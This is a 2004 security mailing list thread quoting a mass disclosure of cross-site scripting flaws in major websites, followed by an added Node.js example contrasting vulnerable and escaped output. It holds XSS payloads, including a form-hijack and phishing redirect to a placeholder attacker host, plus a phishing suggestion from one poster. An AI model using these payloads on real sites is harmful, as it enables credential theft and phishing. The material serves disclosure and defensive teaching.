Open Source and information security mailing list archives
Message-ID: <001101c4e9c8$5a644bf0$0100a8c0@grotedoos>
From: skylined at edup.tudelft.nl (Berend-Jan Wever)
Subject: Cross-Site Scripting - an industry-wide problem

I looked at XSS in major websites in 2002 and found most of them vulnerable then; I reported it to them and to full-disclosure. Apparently nothing's changed: either it is not an issue, or not enough of an issue for them to spend money on.

I wrote two short papers on XSS, they can be found here:
http://www.edup.tudelft.nl/~bjwever/whitepaper_xss.html
http://www.edup.tudelft.nl/~bjwever/whitepaper_xss2.html

Cheers,

Berend-Jan Wever
SMTP: <skylined@...p.tudelft.nl>
HTTP: http://www.edup.tudelft.nl/~bjwever
MSN: Skylined@...p.tudelft.nl
IRC: SkyLined in #SkyLined on EFNET
PGP: key ID 0x48479882

----- Original Message ----- 
From: "morning_wood" <se_cur_ity@...mail.com>
To: "mikx" <mikx@...x.de>; <full-disclosure@...ts.netsys.com>; <bugtraq@...urityfocus.com>; <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>
Sent: Friday, December 24, 2004 07:42
Subject: Re: [Full-Disclosure] Cross-Site Scripting - an industry-wide problem


> quite common, funny because XSS can be used in PHISHING attacks.
> instead of <alert blah> try some html redirects to a hosted site with a fake
> login spoofing the original content (a login page), capture username/password
> and then pass them to the real login page.
> or better yet... XSS DoS attacks, like:
> [script]
> alert("oh no")
> ;window.close()
> [/script]
> 
> but I guess XSS is just kiddie play... or is it?
> 
> m.w
> 
> 
> > Cross-Site Scripting - an industry-wide problem
> > ===============================================
> >
> > In early December I started a series of tests to find Cross-Site Scripting
> > (XSS) vulnerabilities. It quickly turned out that the majority of all major
> > websites suffer some kind of XSS. This is a disclosure of 175
> > vulnerabilities at once. Enjoy the ride...
> >
> > Test scenario
> > =============
> >
> > A site was considered affected if it is possible to inject a javascript into
> > the output page by making a browser GET or POST request to the webserver. As
> > a proof-of-concept the script "alert(document.cookie)" got used.
> >
> > All tests were made on a fully patched WinXP SP2 machine and Internet
> > Explorer 6. Most of the proof-of-concept links in this report will not work
> > using another browser, mainly because in many cases I used javascript in
> > styles which isn't supported by browsers like Firefox and because Firefox
> > automatically applies character encoding to a URL. I was just too lazy to
> > test each issue cross-browser, so this doesn't automatically mean that
> > Internet Explorer is more vulnerable to XSS.
> >
> > Impact
> > ======
> >
> > In many cases XSS is reduced to the attack of stealing session cookies, but
> > XSS can be used to do a lot more things. Using DOM manipulation you can
> > change the target of a login form or fake one, change download links or
> > simply insert your own content into a website. As part of mass-mailings this
> > can be used for login data phishing, spreading of malware or distribution of
> > false news that seem to come from a trustworthy source (which is an
> > interesting option for daytraders on penny stocks, for example).
> >
> > Don't forget that the injected script is running in the security context of
> > the affected site. If you know who you are attacking and that the victim has
> > the affected site in a special trusted zone it can be possible to execute
> > "not safe for scripting" ActiveX controls - giving you more or less total
> > control. In intranets and for extranet web applications this is a not so
> > uncommon configuration.
> >
> > For sure XSS is nothing compared to a remote buffer overflow. But just
> > because this "worst case scenario" is happening quite often these days, it
> > does not mean XSS is not a security issue. XSS flaws are easy to find and
> > spammers are always searching for new stuff.
> >
> > Finally, for some sites on the list dedicated to security an XSS flaw is just
> > an embarrassing thing ;)
> >
> > Affected sites
> > ==============
> >
> > This list is reduced to the second-level domain for readability and posting
> > size. This isn't always fair since sometimes a sub-domain is independent
> > from the SLD. Please download the complete list of proof-of-concept links
> > from http://www.mikx.de/xss.php.
> >
> > All webmasters were informed by an email and/or their website feedback forms
> > during December, to give them a fair chance to react. Some of them replied
> > really quickly and patched the issue in a few hours, others (sadly a lot)
> > never replied. If you are responsible for one of the affected sites and you
> > have not been informed or are not able to reproduce the issue, please don't
> > hesitate to contact me.
> >
> > The sites in the tests were picked at random from international and German
> > major websites and/or sites related to security/computers. I just tested
> > what came to my head - so there is no "hidden message":
> >
> > about.com, activestate.com, adobe.com, altavista.com, amazon.com, amd.com,
> > annoyances.org, aol.com, apache.org, apple.com, archive.org, arcor.de,
> > ask.com, ati.com, bahn.de, bitdefender.de, blizzard.com, blogdex.net,
> > blogger.com, bloogz.com, ca.com, ccc.de, cdu.de, chip.de, ciao.de, cert.org,
> > chillingeffects.org, cnn.com, comdirect.de, consors.de, csialliance.org,
> > csu.de, dell.com, daypop.com, divx.com, dooyoo.de, doubleclick.com,
> > download.com, easycredit.de, ebay.com, etrade.com, evite.com, excite.com,
> > fedex.com, fimatex.de, flexwiki.com, fool.com, free-av.de, freshmeat.net,
> > fsf.org, fujitsu.com, gamestar.de, gm.com, gmx.net, gnu.org, go.com,
> > golem.de, google.com, groupee.com, gruene-partei.de, guenstiger.de,
> > heise.de, hosting.com, hp.com, ibm.com, icq.com, idealo.de, imagemagick.org,
> > infineon.com, informationsecurityireland.com, infospace.com, intel.com,
> > itaa.org, izb.de, jamba.de, juno.com, kde.org, kelkoo.de, kerio.com,
> > liberale.de, linspire.com, looksmart.com, lufthansa.com, lycos.com,
> > macromedia.com, mandrakesoft.com, mayflower.de, mcafee.com, meetup.com,
> > messagelabs.com, metacrawler.com, metadot.com, microsoft.com, mlb.com,
> > mnogosearch.org, modblog.com, modssl.org, mozilla.org, mozillazine.org,
> > msdn.com, msn.com, msnbc.com, nasa.gov, nationalgeographic.com, nba.com,
> > netiq.com, nfl.com, netflix.com, netscape.com, nokia.com, novell.com,
> > nytimes.com, onlinekosten.de, opencores.org, openssl.org, opera.com,
> > oracle.com, paypal.com, pc-magazin.de, pcpowerplay.de, pcwelt.de,
> > phpcenter.de, pmwiki.org, privacy.org, pro7.de, ptb.de, postgresql.org,
> > quoka.de, reactos.com, real.com, redhat.com, redvsblue.com, riaa.com,
> > rtl.de, ryanair.com, sans.org, sbroker.de, securityfocus.com,
> > securityspace.com, shutterfly.com, slashdot.org, snocap.com, sony.com,
> > sourceforge.net, sparkasse.de, spd.de, spreadfirefox.com, squid-cache.org,
> > sqlite.org, staysafeonline.com, stern.de, strato.de, sun.com, suse.de,
> > technorati.com, telekombusiness.de, theonion.com, tiscali.com,
> > tomshardware.com, uci.edu, ups.com, upside.de, us-cert.gov, validome.org,
> > varbusiness.com, vasoftware.com, viruslist.com, w3.org, web.de,
> > worldofwarcraft.com, wsj.com, xoom.com, yahoo.com, yopi.de, zonelabs.com
> >
> > References
> > ==========
> >
> > It turned out that in some cases third party software used on the websites
> > is suffering from a bug. Here are the Common Vulnerabilities and Exposures
> > (cve.mitre.org) names:
> >
> > CAN-2004-1059 mnogosearch (as used at www.redhat.com)
> > CAN-2004-1061 bugzilla (as used at bugzilla.mozilla.org bug #272620)
> > CAN-2004-1062 viewcvs (as used at cvs.apache.org)
> > CAN-2004-1146 cvstrac (as used at cvs.openssl.org)
> >
> > http://www.slashcode.com/article.pl?sid=04/12/15/1540200
> > http://www.mnogosearch.com/winhistory.html
> >
> > Credits
> > =======
> >
> > I would like to thank a few people for helping me out through the tests and
> > working on fixing the issues as quickly as possible:
> >
> > Christoph "Locke" Wehrmann (for making me addicted to XSS)
> > Mark J Cox (Red Hat Security Response Team)
> > Daniel Bachfeld (heisec)
> > Jamie McCarthy and Chris Nandor (slashcode)
> > Alexander Barkov (mnogosearch)
> > Microsoft Security Response Center
> > Google Security Team
> > Bugzilla Team
> > Everybody who responded to my report mail :)
> >
> > Contact
> > =======
> >
> > Michael Krax <mikx@...x.de>
> > http://www.mikx.de/
> >
> >
> > Happy Holidays!
> > mikx
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >

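The test scenario in the quoted report (a script injected through a GET or POST parameter, proof-of-concept "alert(document.cookie)"), the "change the target of a login form" case from its Impact section, and the fake-login redirect from morning_wood's reply, as an added example that is not code from either post. It is a Node.js script; the reflecting handler, the hostnames example.com and attacker.example, and every function and constant name are hypothetical. It also shows the point behind the remark that Firefox percent-encodes the URL: the server decodes it again, so only encoding at the output point closes the hole.

```javascript
// Added example, not code from the original posts. Models the quoted test
// scenario (a GET parameter reflected into the page, proof-of-concept
// alert(document.cookie)) next to the fix: encoding at every output point.
// Node.js; example.com / attacker.example and all names are hypothetical.

// The proof-of-concept script used in the report.
const PROOF_OF_CONCEPT = '<script>alert(document.cookie)</script>';

// "Change the target of a login form" (Impact section) and the fake-login
// redirect from the reply, as payloads. attacker.example is a placeholder.
const FORM_HIJACK =
  "<script>document.forms[0].action='http://attacker.example/login'</script>";
const PHISH_REDIRECT =
  "<script>location.replace('http://attacker.example/fake-login')</script>";

// Breaks out of a value="..." attribute; no <script> tag involved at all.
const ATTR_BREAKOUT = '" autofocus onfocus="alert(document.cookie)';

// What a server-side handler receives: the URL parser undoes whatever
// percent-encoding the browser applied, so encoding the link is no defence.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') || '';
}

// Vulnerable handler: the untrusted value lands in a quoted attribute and
// in element text without encoding.
function renderUnsafe(query) {
  return [
    '<form action="/login" method="post">',
    `  <input name="q" value="${query}">`,
    '  <input name="user"> <input name="pass" type="password">',
    '</form>',
    `<p>Results for: ${query}</p>`,
  ].join('\n');
}

// Encode the characters that change meaning in text content or inside a
// double- or single-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed handler: same template, value encoded at each output point.
function renderSafe(query) {
  const q = escapeHtml(query);
  return [
    '<form action="/login" method="post">',
    `  <input name="q" value="${q}">`,
    '  <input name="user"> <input name="pass" type="password">',
    '</form>',
    `<p>Results for: ${q}</p>`,
  ].join('\n');
}

// Decide whether script got injected by tokenising tags instead of grepping:
// a <script> element, or an on* attribute NAME on any element. In encoded
// output the text "onfocus=" survives only inside a quoted value, where the
// attribute scanner never looks. A check for this test scenario, not a
// general scanner (javascript: URLs and CSS expression() are not covered).
const TAG_RE = /<([a-zA-Z][\w-]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
const ATTR_RE = /\s+([^\s=>\/]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;

function hasInjectedScript(html) {
  for (const [, name, attrs] of html.matchAll(TAG_RE)) {
    if (name.toLowerCase() === 'script') return true;
    for (const [, attr] of attrs.matchAll(ATTR_RE)) {
      if (/^on/i.test(attr)) return true;
    }
  }
  return false;
}

// Stand-alone run: the report's style of proof-of-concept link, percent-
// encoded as a browser would send it, rendered by both handlers.
const demoQuery = queryFromUrl(
  'http://example.com/search?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E');
console.log('unsafe handler, script injected:', hasInjectedScript(renderUnsafe(demoQuery)));
console.log('safe handler,   script injected:', hasInjectedScript(renderSafe(demoQuery)));
```

The encoding must match the context the value is written into; one escapeHtml covers element text and quoted attribute values, but a value placed into a javascript: URL, an unquoted attribute, or a style block (the "javascript in styles" cases the report relied on, IE's CSS expression()) needs its own encoding or must be rejected outright. The tag scanner is only there to make the before/after difference checkable offline; it is not a substitute for testing in a browser.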